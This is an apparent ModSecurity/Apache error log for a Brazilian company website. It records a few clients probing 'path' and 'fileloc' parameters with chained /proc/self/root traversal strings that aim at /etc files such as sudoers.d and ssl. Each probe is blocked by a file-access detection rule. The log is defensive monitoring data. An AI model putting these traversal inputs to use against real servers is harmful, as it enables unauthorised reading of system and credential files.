[Tue Mar 17 11:40:22.025706 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.243.203:39750] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abln1qBJNF7axNlVR0UI8wAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:40:29.312394 2026] [:error] [pid 11293:tid 140411624429312] [client 74.7.241.46:45656] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abln3dCmCSWTlPouqorY2AAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:40:30.172231 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.243.203:48630] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abln3qBJNF7axNlVR0UI_QAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:40:31.534177 2026] [:error] [pid 7437:tid 140411599251200] [client 74.7.243.203:44806] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abln3weiSKl8TjouI-YORgAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:40:31.927642 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.46:43938] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abln39Y0UrI5A3LftIzvIQAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:40:34.888069 2026] [:error] [pid 18709:tid 140411540502272] [client 74.7.243.203:44810] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abln4jarLhPAjZGI1b26lgAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:41:03.171251 2026] [:error] [pid 7437:tid 140411599251200] [client 74.7.243.203:44820] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abln_weiSKl8TjouI-YOZAAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:41:07.570210 2026] [:error] [pid 17965:tid 140411683178240] [client 74.7.243.203:41580] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abloA6t8Nd0UC_OcbVG8ngAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:41:16.967548 2026] [:error] [pid 9155:tid 140411565680384] [client 74.7.243.203:41594] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abloDNbI7zhHXcabyMUymQAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:41:19.373643 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.243.203:36338] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abloDweiSKl8TjouI-YOaAAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:41:20.718361 2026] [:error] [pid 9299:tid 140411624429312] [client 74.7.243.203:50006] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abloEL-sgTmmJoPuMdyrGwAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:41:22.051109 2026] [:error] [pid 9155:tid 140411565680384] [client 74.7.243.203:50012] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abloEtbI7zhHXcabyMUymwAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:41:28.639465 2026] [:error] [pid 1016:tid 140411708356352] [client 74.7.243.203:50022] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abloGJqmL8PQht4WJFlUnQAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:41:34.847276 2026] [:error] [pid 18709:tid 140411725141760] [client 74.7.228.16:52788] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abloHjarLhPAjZGI1b26sAAAA4I"]
[Tue Mar 17 11:41:42.583440 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.243.203:51644] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abloJgeiSKl8TjouI-YOcwAAA8M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:41:47.199660 2026] [:error] [pid 1016:tid 140411741927168] [client 74.7.243.203:49884] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abloK5qmL8PQht4WJFlUpgAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:41:52.468305 2026] [:error] [pid 18709:tid 140411616036608] [client 74.7.243.203:49888] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abloMDarLhPAjZGI1b26twAAA48"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:42:10.059214 2026] [:error] [pid 2160:tid 140411733534464] [client 74.7.241.46:40130] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abloQjjrdei6i7MVRTDQQAAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:42:13.663756 2026] [:error] [pid 2282:tid 140411548894976] [client 74.7.241.46:51128] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abloRakMvtOYthfEFiXFqwAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:43:06.755100 2026] [:error] [pid 2742:tid 140411582465792] [client 74.7.241.46:51134] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abloeqWl1W69SFJ8FcxjAAAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:43:10.223783 2026] [:error] [pid 9155:tid 140411708356352] [client 74.7.241.46:50012] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abloftbI7zhHXcabyMUyvAAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:43:11.549129 2026] [:error] [pid 9155:tid 140411708356352] [client 74.7.241.46:56588] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablof9bI7zhHXcabyMUyvQAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
